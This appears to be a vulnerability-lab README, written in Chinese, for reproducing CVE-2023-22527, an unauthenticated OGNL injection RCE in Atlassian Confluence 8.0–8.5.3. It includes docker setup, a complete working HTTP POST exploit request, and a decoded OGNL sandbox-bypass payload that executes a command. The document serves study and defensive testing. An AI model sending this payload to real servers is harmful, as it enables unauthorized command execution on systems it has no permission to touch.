# Confluence OGNL表达式注入命令执行漏洞（CVE-2023-22527）

Atlassian Confluence是企业广泛使用的wiki系统。

在Confluence 8.0到8.5.3版本之间，存在一处由于任意velocity模板被调用导致的OGNL表达式注入漏洞，未授权攻击者利用该漏洞可以直接攻击Confluence服务器并执行任意命令。

参考链接：

- <https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html>
- <https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/>

## 漏洞环境

执行如下命令启动一个Confluence Server 8.5.3：

```
docker compose up -d
```

环境启动后，访问`http://your-ip:8090`即可进入安装向导，参考[CVE-2019-3396](https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396)这个环境中的安装方法，申请试用版许可证。在填写数据库信息的页面，PostgreSQL数据库地址为`db`，数据库名称`confluence`，用户名密码均为`postgres`。

![](1.png)

## 漏洞复现

该漏洞利用方法十分简单，直接发送如下请求即可执行任意命令，并在HTTP返回头中获取执行结果：

```
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 285

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
```

![](2.png)

在Confluence 7.18.0版本后，官方开发者为其引入了`isSafeExpression`函数来限制执行恶意OGNL表达式。安全研究者[Alvaro Muñoz](https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/)分享了一种利用velocity模板中的`#request['.KEY_velocity.struts2.context'].internalGet('ognl').findValue(String, Object)`来获取无沙箱的OGNL对象并执行任意语句的绕过方法，完整并解码后的Payload如下：

```
'+(#request['.KEY_velocity.struts2.context'].internalGet('ognl').findValue(@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"})),{}))+'
```
